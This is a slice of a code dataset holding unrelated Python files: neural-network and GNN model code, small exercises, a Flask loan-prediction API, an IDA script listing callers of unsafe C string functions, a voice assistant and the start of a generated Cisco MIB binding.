else 0\n elif func_type == 'linear':\n return z\n\ndef derivative_func(func_type, z):\n \"\"\"\n Função que implementa as derivadas das funções de ativação mais comuns\n Parãmetros: func_type - uma string que contém a derivada da função de ativação desejada\n z - vetor com os valores de entrada X multiplicado pelos pesos\n Retorna: saída da derivada da função de ativação\n \"\"\"\n ### Seu código aqui (~2 linhas)\n if func_type == 'sigmoid':\n return z * (1 - z)\n elif func_type == 'tanh':\n return (1 - z**2) / 2\n elif func_type == 'relu':\n return 1 if z >= 0 else 0\n elif func_type == 'degrau':\n return 0 if z <= 0 else 1\n elif func_type == 'signum':\n return 0 if z == 0 else 1\n elif func_type == 'linear':\n return 0 if z == 0 else 1\n\ndef forward(neural_network, X, activation_fn):\n \"\"\"\n Função que implementa a etapa forward propagate da rede neural\n Parâmetros: neural_network - lista (camadas) de listas (neurônios) de listas (pesos com bias)\n X - entradas\n \"\"\"\n outputs = []\n for n, layer in enumerate(neural_network):\n X_with_bias = X + [1] # para facilitar a multiplicação X * Ws, inclui o peso 1 para o bias\n # OR para o caso de não haver a camada oculta - perceptron de camada única\n layer_output 
= [activation_func(activation_fn if n == 1 else 'tanh', dot(X_with_bias, neuron)) for neuron in layer] or X\n        X = layer_output\n\n        outputs.append(layer_output)\n    return outputs\n\ndef backpropagation(training_matrix, neural_network, learning_rate, activation_fn, num_epoch, batch_size, momentum=0):\n    \"\"\"\n    Função que implementa o loop do treinamento com backpropagation\n    Parâmetros: x - entrada da rede\n                y - rótulos/labels\n                neural_network - lista (camadas) de listas (neurônios) de listas (pesos com bias)\n                num_interaction - quantidade de interações desejada para a rede convergir\n                learning_rate - taxa de aprendizado para cálculo do erro\n    \"\"\"\n    training_len = len(training_matrix)\n\n    E_med_training = []\n\n    old_out_deltas = []\n    old_hid_deltas = []\n    for __ in range(num_epoch):\n\n        E_med = 0\n\n        num_batch = 0\n\n        for X, y in training_matrix:\n\n            hidden_outputs, outputs = forward(neural_network, X, activation_fn)\n\n            E_med += sum([(y[i] - output)**2 for i, output in enumerate(outputs)])\n\n            num_batch += 1\n\n            if num_batch == 1:\n                # deltas da camada de saída\n                output_deltas = [derivative_func(activation_fn, output) * (y[i] - output)\n                                 for i, output in enumerate(outputs)]\n\n                # deltas da camada oculta\n                hidden_deltas = [derivative_func('tanh', hidden_output) *\n                                 dot(output_deltas, [n[i] for n in neural_network[-1]])\n                                 for i, hidden_output in enumerate(hidden_outputs)]\n            else:\n                output_deltas = [output_deltas[j] + delta\n                                 for j, delta in enumerate([derivative_func(activation_fn, output) * (y[i] - output)\n                                                            for i, output in enumerate(outputs)])]\n\n                hidden_deltas = [hidden_deltas[j] + delta\n                                 for j, delta in enumerate([derivative_func(activation_fn, hidden_output) *\n                                                            dot(output_deltas, [n[i] for n in neural_network[-1]])\n                                                            for i, hidden_output in enumerate(hidden_outputs)])]\n\n            if num_batch in [batch_size, training_len]:\n                # ajusta os pesos para a camada de saída\n                for i, output_neuron in enumerate(neural_network[-1]):\n                    for j, hidden_output in enumerate(hidden_outputs + [1]):\n                        output_neuron[j] += learning_rate * output_deltas[i] * hidden_output\n                        if momentum and old_out_deltas:\n                            output_neuron[j] += momentum * old_out_deltas[i]\n\n                old_out_deltas = output_deltas\n\n                # ajusta os pesos para a camada oculta\n                for i, hidden_neuron in enumerate(neural_network[0]):\n                    for j, input in enumerate(X + [1]):\n                        hidden_neuron[j] += learning_rate * hidden_deltas[i] * input\n                        if momentum and old_hid_deltas:\n                            hidden_neuron[j] += momentum * old_hid_deltas[i]\n\n                old_hid_deltas = hidden_deltas\n\n                num_batch = 0\n\n        E_med_training.append(E_med / (2*training_len))\n\n    return E_med_training\n\n#-------------------------------------------------------------------------\n\n# Questão 1\n#\n# paterns = [([0, 0, 0], [+1, -1, -1, -1, -1, -1, -1, -1]),\n#            ([0, 0, 1], [-1, +1, -1, -1, -1, -1, -1, -1]),\n#            ([0, 1, 0], [-1, -1, +1, -1, -1, -1, -1, -1]),\n#            ([0, 1, 1], [-1, -1, -1, +1, -1, -1, -1, -1]),\n#            ([1, 0, 0], [-1, -1, -1, -1, +1, -1, -1, -1]),\n#            ([1, 0, 1], [-1, -1, -1, -1, -1, +1, -1, -1]),\n#            ([1, 1, 0], [-1, -1, -1, -1, -1, -1, +1, -1]),\n#            ([1, 1, 1], [-1, -1, -1, -1, -1, -1, -1, +1]),\n#            ]\n#\n# training_set = [([x[0]+random.uniform(-1,1)/10, x[1]+random.uniform(-1,1)/10, x[2]+random.uniform(-1,1)/10], y)\n#                 for x, y in paterns\n#                 for __ in range(10)]\n#\n# input_size = 3 # vertices do cubo\n# num_hidden = 0 # não temos neurônios na camada oculta - Perceptron de Rosenblatt (Perceptron de camada única)\n# output_size = 8 # oito neurônios na camada de saída, um para cada um dos oito padroes\n#\n# # 
inicializa os pesos e bias para os neuronios da camada de saída - Perceptron de Rosenblatt (Perceptron de camada única)\n# hidden_layer, output_layer = weight_init(input_size, num_hidden, output_size)\n# network = [hidden_layer, output_layer]\n#\n# learning_rate = 0.5\n# activation_fn = 'signum'\n# num_epoch = 15\n# batch_size = 1\n# momentum = 0.01\n#\n# print 'Conjunto de treinamento:', len(training_set)\n# for x, y in training_set[7:13]:\n# print x, y\n#\n# erro = backpropagation(paterns, network, learning_rate, activation_fn, num_epoch, batch_size, momentum)\n#\n# print 'Erro quadratico medio:', erro\n# x = [range(len(erro))]\n# plt.scatter(x, erro)\n# plt.show()\n#\n# print 'Conjunto de validaçao:'\n# for input_vector, target_vector in paterns:\n# outputs = forward(network, input_vector, activation_fn)[-1]\n# print input_vector, target_vector, outputs\n#\n\n# Questão 3\n#\n# treina_xor = [([0, 0], [0]),\n# ([0, 1], [1]),\n# ([1, 0], [1]),\n# ([1, 1], [0]),\n# ]\n#\n# treina_sen = [([x],[math.sin(math.pi * x) / (math.pi * x)]) for x in [random.uniform(0,4) for _ in range(1000)]]\n#\n# input_size = 2 # entradas do XOR/sen\n# num_hidden = 6 # XOR = 2\n# output_size = 1\n#\n# # inicializa os pesos e bias para os neuronios da camada oculta e de saída\n# hidden_layer, output_layer = weight_init(input_size, num_hidden, output_size)\n# network = [hidden_layer, output_layer]\n#\n# # parametros XOR\n# # learning_rate = 5\n# # activation_fn = 'sigmoid'\n# # num_epoch = 300\n# # batch_size = 1\n# # momentum = 0\n#\n# # parametros sen\n# learning_rate = 0.5\n# activation_fn = 'tanh'\n# num_epoch = 150\n# batch_size = 1\n# momentum = 0\n#\n#\n# print 'Conjunto de treinamento:', len(treina_sen)\n# for x, y in treina_sen[:10]:\n# print x, y\n#\n# erro = backpropagation(treina_sen, network, learning_rate, activation_fn, num_epoch, batch_size, momentum)\n#\n# print 'Erro quadratico medio:', erro\n# x = [range(len(erro))]\n# plt.scatter(x, erro)\n# plt.show()\n#\n# print 'Conjunto de validaçao:'\n# # for input_vector, target_vector in treina_xor:\n# # outputs = forward(network, input_vector, activation_fn)[-1]\n# # print input_vector, target_vector, outputs\n#\n# x = []\n# y = []\n# z = []\n# for input_vector, target_vector in treina_sen:\n# y_pred = forward(network, input_vector, activation_fn)[-1]\n# x.append(input_vector[0])\n# y.append(target_vector[0])\n# z.append('b')\n# x.append(input_vector[0])\n# y.append(y_pred[0])\n# z.append('g')\n# plt.scatter(x,y,color=z,marker='.')\n# plt.show()\n\n#\n# Questão 4\n#\n# padrao = [[x,y] for x, y in [(random.uniform(-1,1), random.uniform(-1,1)) for _ in range(10000)] if x**2 + y**2 <= 1]\n# rotulo = [[3,7,2,6,4,8,1,5][4*(x>0)+2*(y>0)+(abs(y)>1-abs(x))] for x,y in padrao]\n# rotulo_byte = []\n# for i in rotulo:\n# #rotulo_bit = [[-1,-1,-1],[-1,-1,1],[-1,1,-1],[-1,1,1],[1,-1,-1],[1,-1,1],[1,1,-1],[1,1,1]][i-1]\n# rotulo_bit = [-1,-1,-1,-1,-1,-1,-1,-1]\n# rotulo_bit[i-1] = 1\n# rotulo_byte.append(rotulo_bit)\n#\n# padrao_rotulo = zip(padrao, rotulo_byte)\n#\n# input_size = 2 # coordenadas x,y\n# num_hidden = 6 # 1 para cada padrão de reta\n# output_size = 8 # one-of-c-classes\n#\n# # inicializa os pesos e bias para os neuronios da camada oculta e de saída\n# hidden_layer, output_layer = weight_init(input_size, num_hidden, output_size)\n# network = [hidden_layer, output_layer]\n#\n# learning_rate = 0.5\n# activation_fn = 'signum'\n# num_epoch = 100\n# batch_size = 1\n# momentum = 0.01\n#\n# print 'Conjunto de treinamento:', len(padrao_rotulo)\n# for i in 
range(10):\n# print padrao[i], rotulo[i], rotulo_byte[i]\n#\n# cores = [['red','green','blue','gray','gray','blue','green','red'][4*(x>0)+2*(y>0)+(abs(y)>1-abs(x))] for x,y in padrao]\n# x = [x for x, __ in padrao]\n# y = [y for __, y in padrao]\n# plt.scatter(x,y,color=cores,marker='.')\n# plt.show()\n#\n# erro = backpropagation(padrao_rotulo, network, learning_rate, activation_fn, num_epoch,\n# batch_size, momentum)\n#\n# print 'Erro quadratico medio:', erro\n# x = [range(len(erro))]\n# plt.scatter(x, erro)\n# plt.show()\n#\n# padrao = [[x,y] for x, y in [(random.uniform(-1,1), random.uniform(-1,1)) for _ in range(10000)] if x**2 + y**2 <= 1]\n# rotulo = [[3,7,2,6,4,8,1,5][4*(x>0)+2*(y>0)+(abs(y)>1-abs(x))] for x,y in padrao]\n#\n# print 'Conjunto de validaçao:', len(padrao)\n# y_pred = []\n# for i in range(len(padrao)):\n# outputs = forward(network, padrao[i], activation_fn)[-1]\n# y_pred.append(outputs)\n# if i < 10:\n# print padrao[i], rotulo[i], outputs\n#\n# cores = [['green','blue','red','gray','red','gray','green','blue','black'][8 if sum(y) != -6 else dot([0,1,2,3,4,5,6,7], [0 if i < 0 else 1 for i in y])] for y in y_pred]\n# #cores = [['green','blue','red','gray','red','gray','green','blue','black'][dot([4,2,1], [0 if i < 0 else 1 for i in y])] for y in y_pred]\n# x = [x for x, __ in padrao]\n# y = [y for __, y in padrao]\n# plt.scatter(x,y,color=cores,marker='.')\n# plt.show()\n#\n# y = [8 if sum(y) != -6 else dot([0,1,2,3,4,5,6,7], [0 if i < 0 else 1 for i in y]) for y in y_pred]\n#\n# print(confusion_matrix(rotulo, y))\n\n#\n# Questão 5\n#\n# ne = 10 # número de entradas anteriores\n# np = 3 # número de passos posteriores\n#\n# function_set = [math.sin(x/10 + math.sin(x/10)**2) for x in range(0,120+np)]\n#\n# treina_predicao = [([function_set[x-i] for i in range(1, ne+1)], [function_set[x+j] for j in range(0, np)]) for x in range(ne, len(function_set)-np+1)]\n#\n# input_size = ne # entradas do x(n) = sen(n + sen2(n))\n# num_hidden = ne\n# output_size = np\n#\n# # inicializa os pesos e bias para os neuronios da camada oculta e de saída\n# hidden_layer, output_layer = weight_init(input_size, num_hidden, output_size)\n# network = [hidden_layer, output_layer]\n#\n# learning_rate = 0.25\n# activation_fn = 'tanh'\n# num_epoch = 1000\n# batch_size = 1\n# momentum = 0\n#\n# print 'Conjunto de treinamento:', len(treina_predicao)\n# for x, y in treina_predicao[:10]:\n# print x, y\n#\n# erro = backpropagation(treina_predicao, network, learning_rate, activation_fn, num_epoch,\n# batch_size) # , momentum, old_out_deltas, old_hid_deltas)\n#\n# print 'Erro quadratico medio:', erro\n# x = [range(len(erro))]\n# plt.scatter(x, erro)\n# plt.show()\n#\n# print 'Conjunto de validaçao:'\n# x = [x/10 for x in range(0, len(function_set))]\n# y = function_set\n# z= [0 for __ in x]\n# for i in range(ne, len(function_set)-np+1):\n# input_vector = [function_set[i-j] for j in range(1, ne+1)]\n# y_pred = forward(network, input_vector, activation_fn)[-1]\n# for j in range(0, np):\n# x.append((i+j)/10)\n# y.append(y_pred[j])\n# z.append(j)\n#\n# plt.scatter(x,y,c=z,marker='.')\n# plt.show()\n","repo_name":"fabioasilva/deeplearning","sub_path":"multilayer_perceptron.py","file_name":"multilayer_perceptron.py","file_ext":"py","file_size_in_byte":14651,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9766847715","text":"import requests\nimport json\nfrom datetime import datetime\n\n\ndef cotacao(valor):\n url = 
\"https://economia.awesomeapi.com.br/last/USD-BRL\"\n ret = requests.get(url)\n dolar = json.loads(ret.text)[\"USDBRL\"]\n return float(dolar[\"bid\"]) * valor\n\n\nmoeda = cotacao(1)\nprint(f\"Cotacao atual: {moeda}\")\n\nwith open(\"cambio.csv\", \"a\") as file:\n file.write(f\"{datetime.strftime(datetime.now(),'%d/%m/%Y %H:%M')};{moeda}\")\n","repo_name":"karinnecristina/Engenharia_de_Dados","sub_path":"jenkins/cambio/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"48"} +{"seq_id":"16049256701","text":"N, M = [int(x) for x in input().split()]\n\ndef teste_primo(x):\n divisores = 0\n for num in range(1, x+1):\n if x % num == 0:\n divisores += 1\n return divisores == 2\n \n\ndef encontra_primo(x):\n for num in range(x, 0, -1):\n if teste_primo(num):\n primo = num\n break\n return primo\n\n\nprint(encontra_primo(N) * encontra_primo(M))\n","repo_name":"BonomoJoaoPaulo/Beecrowd_problems","sub_path":"Python/2100-2199/uri2116.py","file_name":"uri2116.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29445591139","text":"ea = ScreenEA()\n\n\n# Loop through all the functions.\nfor f in Functions(SegStart(ea), SegEnd(ea)):\n\n # For each of the incoming references.\n for ref in CodeRefsTo(f, 0):\n\n \n # Get the name of the referring function.\n caller_name = GetFunctionName(ref)\n # Get the address of the referring function.\n caller_addr = GetFunctionAttr(ref, FUNCATTR_START)\n\n # Get the name of the function being called.\n called_name = GetFunctionName(f)\n \n # If the called function is any of the desired functions, print \"Name of caller function:Address of caller function:Name of called function\".\n if called_name == \"strcpy\" or called_name == \"sprintf\" or called_name == \"strncpy\" or called_name == \"wcsncpy\" or called_name == \"swprintf\":\n print(\"%s:%s:%s\\n\" %(caller_name, hex(id(caller_addr)), called_name))\n\n\n","repo_name":"mccormickc2/lab_4","sub_path":"detect_functions/detect_functions.py","file_name":"detect_functions.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33941043816","text":"from typing import NoReturn, Optional\n\nimport pytest\n\nfrom homework.hw3.task4_armstrong import is_armstrong\n\n\n@pytest.mark.parametrize(\n (\"value\", \"expected_result\"),\n [\n (153, True),\n (10, False),\n ],\n)\ndef test_is_armstrong(value: int, expected_result: bool) -> Optional[NoReturn]:\n actual_result = is_armstrong(value)\n\n assert actual_result == expected_result\n","repo_name":"featherko/epythopam","sub_path":"test/hw3/test_task4_armstrong.py","file_name":"test_task4_armstrong.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11813501939","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch_geometric.nn import (GlobalAttention, LEConv, Set2Set,\n global_add_pool, global_max_pool,\n global_mean_pool)\n\nfrom models.conv import GNN_node, GNN_node_Virtualnode\n\n\nclass GNN(torch.nn.Module):\n\n def __init__(self,\n num_class,\n num_layer=5,\n emb_dim=300,\n input_dim=1,\n gnn_type='gin',\n virtual_node=True,\n residual=False,\n drop_ratio=0.5,\n JK=\"last\",\n graph_pooling=\"mean\",\n pred_head=\"cls\",\n 
edge_dim=-1):\n '''\n num_tasks (int): number of labels to be predicted\n virtual_node (bool): whether to add virtual node or not\n '''\n\n super(GNN, self).__init__()\n\n self.num_layer = num_layer\n self.drop_ratio = drop_ratio\n self.JK = JK\n self.emb_dim = emb_dim\n self.num_class = num_class\n self.graph_pooling = graph_pooling\n\n # if self.num_layer < 2:\n # raise ValueError(\"Number of GNN layers must be greater than 1.\")\n\n ### GNN to generate node embeddings\n if gnn_type.lower() == \"le\":\n self.gnn_node = LeGNN(in_channels=input_dim,\n hid_channels=emb_dim,\n num_layer=num_layer,\n drop_ratio=drop_ratio,\n num_classes=num_class,\n edge_dim=edge_dim)\n else:\n if virtual_node:\n self.gnn_node = GNN_node_Virtualnode(num_layer,\n emb_dim,\n input_dim=input_dim,\n JK=JK,\n drop_ratio=drop_ratio,\n residual=residual,\n gnn_type=gnn_type,\n edge_dim=edge_dim)\n else:\n self.gnn_node = GNN_node(num_layer,\n emb_dim,\n input_dim=input_dim,\n JK=JK,\n drop_ratio=drop_ratio,\n residual=residual,\n gnn_type=gnn_type,\n edge_dim=edge_dim)\n\n ### Pooling function to generate whole-graph embeddings\n if self.graph_pooling == \"sum\":\n self.pool = global_add_pool\n elif self.graph_pooling == \"mean\":\n self.pool = global_mean_pool\n elif self.graph_pooling == \"max\":\n self.pool = global_max_pool\n elif self.graph_pooling == \"attention\":\n self.pool = GlobalAttention(gate_nn=torch.nn.Sequential(torch.nn.Linear(\n emb_dim, 2 * emb_dim), torch.nn.BatchNorm1d(2 *\n emb_dim), torch.nn.ReLU(), torch.nn.Linear(2 * emb_dim, 1)))\n elif self.graph_pooling == \"set2set\":\n self.pool = Set2Set(emb_dim, processing_steps=2)\n else:\n raise ValueError(\"Invalid graph pooling type.\")\n\n if pred_head == \"cls\":\n if graph_pooling == \"set2set\":\n self.graph_pred_linear = torch.nn.Linear(2 * self.emb_dim, self.num_class)\n else:\n self.graph_pred_linear = torch.nn.Linear(self.emb_dim, self.num_class)\n elif pred_head == \"inv\":\n self.graph_pred_linear = torch.nn.Sequential(nn.Linear(emb_dim, 2 * emb_dim), nn.ReLU(),\n nn.Linear(2 * emb_dim, self.num_class))\n\n self.spu_mlp = torch.nn.Sequential(nn.Linear(emb_dim, 2 * emb_dim), nn.ReLU(),\n nn.Linear(2 * emb_dim, self.num_class))\n self.cq = nn.Linear(self.num_class, self.num_class)\n self.spu_fw = torch.nn.Sequential(self.spu_mlp, self.cq)\n elif pred_head == \"spu\":\n self.graph_pred_linear = torch.nn.Sequential(nn.Linear(emb_dim, 2 * emb_dim), nn.ReLU(),\n nn.Linear(2 * emb_dim, self.num_class))\n self.spu_gcn = GNN_node(num_layer=1,\n emb_dim=emb_dim,\n input_dim=emb_dim,\n JK=JK,\n drop_ratio=drop_ratio,\n residual=residual,\n gnn_type=gnn_type)\n self.spu_mlp = torch.nn.Sequential(nn.Linear(emb_dim, 2 * emb_dim), nn.ReLU(),\n nn.Linear(2 * emb_dim, self.num_class))\n self.cq = nn.Linear(self.num_class, self.num_class)\n self.spu_fw = torch.nn.Sequential(self.spu_mlp, self.cq)\n\n def get_spu_pred_forward(self, batched_data, get_rep=False):\n # if using DIR, won't consider gradients for encoder\n # h_node = self.gnn_node(batched_data)\n # h_graph = self.pool(h_node, batched_data.batch).detach()\n h_node = self.spu_gcn(batched_data)\n h_graph = self.pool(h_node, batched_data.batch)\n\n if get_rep:\n return self.spu_fw(h_graph), h_graph\n return self.spu_fw(h_graph)\n\n def get_spu_pred(self, batched_data, get_rep=False):\n # if using DIR, won't consider gradients for encoder\n h_node = self.gnn_node(batched_data)\n h_graph = self.pool(h_node, batched_data.batch).detach()\n\n if get_rep:\n return self.spu_fw(h_graph), h_graph\n return 
self.spu_fw(h_graph)\n\n def forward(self, batched_data, get_rep=False):\n h_node = self.gnn_node(batched_data)\n\n h_graph = self.pool(h_node, batched_data.batch)\n\n if get_rep:\n return self.graph_pred_linear(h_graph), h_graph\n return self.graph_pred_linear(h_graph)\n\n def forward_rep(self, batched_data):\n h_node = self.gnn_node(batched_data)\n h_graph = self.pool(h_node, batched_data.batch)\n return h_graph\n\n def forward_cls(self, h_graph):\n return self.graph_pred_linear(h_graph)\n\n def forward_spu_cls(self, h_graph):\n return self.spu_fw(h_graph)\n\n def forward_cl(self, batched_data):\n h_node = self.gnn_node(batched_data)\n\n h_graph = self.pool(h_node, batched_data.batch)\n z = self.proj_head(h_graph)\n return z\n\n def loss_cl(self, x1, x2):\n T = 0.5\n batch_size, _ = x1.size()\n\n x1_abs = x1.norm(dim=1)\n x2_abs = x2.norm(dim=1)\n\n sim_matrix = torch.einsum('ik,jk->ij', x1, x2) / torch.einsum('i,j->ij', x1_abs, x2_abs)\n sim_matrix = torch.exp(sim_matrix / T)\n pos_sim = sim_matrix[range(batch_size), range(batch_size)]\n loss = pos_sim / (sim_matrix.sum(dim=1) - pos_sim)\n loss = -torch.log(loss).mean()\n return loss\n\n\nclass LeGNN(torch.nn.Module):\n\n def __init__(self, in_channels, hid_channels=64, num_classes=3, num_layer=2, drop_ratio=0.5, edge_dim=-1):\n super().__init__()\n\n self.num_layer = num_layer\n self.node_emb = nn.Linear(in_channels, hid_channels)\n self.drop_ratio = drop_ratio\n self.convs = nn.ModuleList()\n self.relus = nn.ModuleList()\n for i in range(num_layer):\n conv = LEConv(in_channels=hid_channels, out_channels=hid_channels)\n self.convs.append(conv)\n self.relus.append(nn.ReLU())\n\n def forward(self, batched_data):\n x, edge_index, edge_attr, batch = batched_data.x, batched_data.edge_index, batched_data.edge_attr, batched_data.batch\n\n node_x = self.get_node_reps(x, edge_index, edge_attr, batch)\n return node_x\n\n def get_node_reps(self, x, edge_index, edge_attr, batch):\n x = self.node_emb(x)\n for conv, ReLU in zip(self.convs, self.relus):\n x = conv(x=x, edge_index=edge_index, edge_weight=edge_attr)\n x = F.dropout(x, p=self.drop_ratio, training=self.training)\n x = ReLU(x)\n node_x = x\n return node_x\n\n def get_graph_rep(self, x, edge_index, edge_attr, batch):\n\n node_x = self.get_node_reps(x, edge_index, edge_attr, batch)\n graph_x = global_mean_pool(node_x, batch)\n return graph_x\n\n def get_causal_pred(self, causal_graph_x):\n pred = self.causal_mlp(causal_graph_x)\n return pred\n\n def get_spu_pred(self, spu_graph_x):\n pred = self.spu_fw(spu_graph_x)\n return pred\n\n def get_comb_pred(self, causal_graph_x, spu_graph_x):\n causal_pred = self.causal_mlp(causal_graph_x)\n spu_pred = self.spu_mlp(spu_graph_x).detach()\n return torch.sigmoid(spu_pred) * causal_pred\n\n def reset_parameters(self):\n with torch.no_grad():\n for param in self.parameters():\n param.uniform_(-1.0, 1.0)\n\nif __name__ == '__main__':\n GNN(num_class=10)\n","repo_name":"LFhase/CIGA","sub_path":"models/gnn.py","file_name":"gnn.py","file_ext":"py","file_size_in_byte":9369,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"48"} +{"seq_id":"71672097747","text":"import numpy as np\nfrom flask import Flask, request, jsonify, render_template\nimport pickle\nimport pandas as pd\nfrom flask_cors import CORS, cross_origin\n\n\napp = Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\nmodel = pickle.load(open('model.pkl', 'rb'))\nmodel2 = pickle.load(open('model2.pkl', 
'rb'))\n\n@app.route('/')\ndef home():\n return \"App is Working\"\n\n\n\n@app.route('/predict_api',methods=['POST'])\n@cross_origin()\ndef predict_api():\n '''\n For direct API calls trought request\n '''\n data = request.get_json(force=True)\n print(data.values())\n prediction = model.predict(pd.DataFrame([np.array(list(data.values()))]))\n prediction_prob = model.predict_proba(pd.DataFrame([np.array(list(data.values()))]))\n\n isDefault = int(prediction[0])\n prob = float(prediction_prob[0][0])\n\n \n\n ret ={\n 'is_deafult': isDefault,\n 'safe_factor': prob,\n 'safe_amount': calculate_amount(data) if isDefault==1 else data['FINANCE_AMOUNT'],\n 'arreas_rentals': get_arreas_rentals(data) if isDefault==1 else -1\n }\n \n return jsonify(ret)\n\ndef calculate_amount(data):\n finance_amout=[data['FINANCE_AMOUNT']]\n probs =[1]\n i=0\n\n while probs[-1]>=0.5:\n curr_amount = finance_amout[-1]-5000\n if(curr_amount< finance_amout[0]/2):\n return curr_amount\n data['FINANCE_AMOUNT'] = curr_amount\n finance_amout.append(curr_amount)\n p = model.predict_proba(pd.DataFrame([np.array(list(data.values()))]))\n probs.append(p[0][1])\n print(\"Amount: \", curr_amount, \"prob: \",p[0][1])\n i+=1\n return finance_amout[-1]\n\n\ndef get_arreas_rentals(data):\n arreas_rentals = int(model2.predict(pd.DataFrame([np.array(list(data.values()))]))*data['NO_OF_RENTAL'])\n return arreas_rentals\n\n \n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"JayodKavinda/loan-flask-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"36893735768","text":"import day13put\r\nimport numpy as np\r\ninput_used = day13put.input1\r\ncoords = input_used[0]\r\nfolds = input_used[1]\r\n\r\nxmax, ymax = max([tup[0] for tup in coords]) +1, max([tup[1] for tup in coords]) +1\r\narray1 = np.zeros((xmax, ymax))\r\nprint(array1.shape)\r\nfor coord in coords:\r\n array1[(coord)] = 1\r\n\r\ndef fold_in_half(array, axis):\r\n halves = np.array_split(array, 2, axis=fold_axis)\r\n dotsonhalve2 = np.where(np.flip(halves[1], axis=fold_axis) == 1)\r\n for dot in np.nditer(dotsonhalve2):\r\n halves[0][dot] = 1\r\n result = np.delete(halves[0], (-1), axis=fold_axis)\r\n return result\r\n\r\nfolded_array = array1\r\nprint(f'{folded_array.T}\\n')\r\nprint(folded_array.shape)\r\n\r\n# for fold in folds:\r\nfor i in range(1):\r\n fold = folds[0]\r\n\r\n fold_axis = 0 if not fold[1] else 1\r\n folded_array = fold_in_half(folded_array, fold_axis)\r\n print(f'{folded_array.T}\\n')\r\n print(folded_array.shape)\r\n print(f'number of dots = {len(np.where(folded_array == 1)[0])}')\r\n\r\n","repo_name":"vakansie/adventofcode2021","sub_path":"day13-1.py","file_name":"day13-1.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1071506178","text":"import os\nimport time\nimport speech_recognition as sr\nfrom fuzzywuzzy import fuzz\nimport pyttsx3\nimport datetime\n\n\noptions = {\n \"alias\": (\"alexey\", \"alex\", \"lyosha\", \"lesha\", \"leha\", \"lyoha\",\n \"leshidze\"),\n \"to_be_removed\": (\"say\", \"tell\", \"show\", \"what\", \"how\"),\n \"commands\": {\n \"current_time\": (\"current time\", \"time is it\")\n }\n}\n\n\ndef speak(phrase_to_speak):\n \"\"\" pyttsx3 saying function. 
\"\"\"\n print(phrase_to_speak)\n speak_engine.say(phrase_to_speak)\n speak_engine.runAndWait()\n speak_engine.stop()\n\n\ndef callback(recognizer, audio):\n \"\"\" Basic audio recognition. \"\"\"\n try:\n voice = recognizer.recognize_google(audio, language=\"en-EN\").lower()\n print(\"[log] Recognized: \" + voice)\n\n if voice.startswith(options[\"alias\"]):\n command = voice\n\n for option in options[\"alias\"]:\n command = command.replace(option, \"\").strip()\n\n for option in options[\"to_be_removed\"]:\n command = command.replace(option, \"\").strip()\n\n command = recognize_command(command)\n execute_command(command[\"command\"])\n\n except sr.UnknownValueError:\n print(\"[log] Voice isn't recognized!\")\n except sr.RequestError:\n print(\"[log] Unexpected error, check your connection!\")\n\n\ndef recognize_command(command):\n \"\"\" Command recognition. \"\"\"\n RC = {\"command\": \"\", \"percent\": 0}\n for cmd, value in options['commands'].items():\n for option in value:\n vrt = fuzz.ratio(command, option)\n if vrt > RC[\"percent\"]:\n RC[\"command\"] = cmd\n RC[\"percent\"] = vrt\n\n return RC\n\n\ndef execute_command(command):\n \"\"\" Command execution. \"\"\"\n if command == \"current_time\":\n now = datetime.datetime.now()\n speak(\"Now is \" + str(now.hour) + \":\" + str(now.minute))\n\n else:\n speak(\"I don't know this command, could you repeate?\")\n\n\n# Initialization.\nrecognizer = sr.Recognizer()\nmicrophone = sr.Microphone(device_index=5)\n\nwith microphone as source:\n recognizer.adjust_for_ambient_noise(source)\n\nspeak_engine = pyttsx3.init()\n\nspeak(\"Welcome, I am Alexey, how can I help you?\")\n\n# Non-stop command listenning.\nstop_listening = recognizer.listen_in_background(microphone, callback)\nwhile True:\n time.sleep(0.1)\n","repo_name":"hackfeed/alexey-voice-assistant","sub_path":"assistant.py","file_name":"assistant.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"11677334287","text":"\"\"\" CISCO_IPMROUTE_MIB \n\nThe MIB module for management of IP Multicast routing,\nbut independent of the specific multicast routing protocol\nin use.\n\n\"\"\"\nfrom ydk.entity_utils import get_relative_entity_path as _get_relative_entity_path\nfrom ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64\nfrom ydk.filters import YFilter\nfrom ydk.errors import YPYError, YPYModelError\nfrom ydk.errors.error_handler import handle_type_error as _handle_type_error\n\n\n\nclass CiscoIpmrouteMib(Entity):\n \"\"\"\n \n \n .. attribute:: ciscoipmroute\n \n \t\n \t**type**\\: :py:class:`Ciscoipmroute `\n \n .. attribute:: ciscoipmrouteheartbeattable\n \n \tThe (conceptual) table listing sets of IP Multicast heartbeat parameters. 
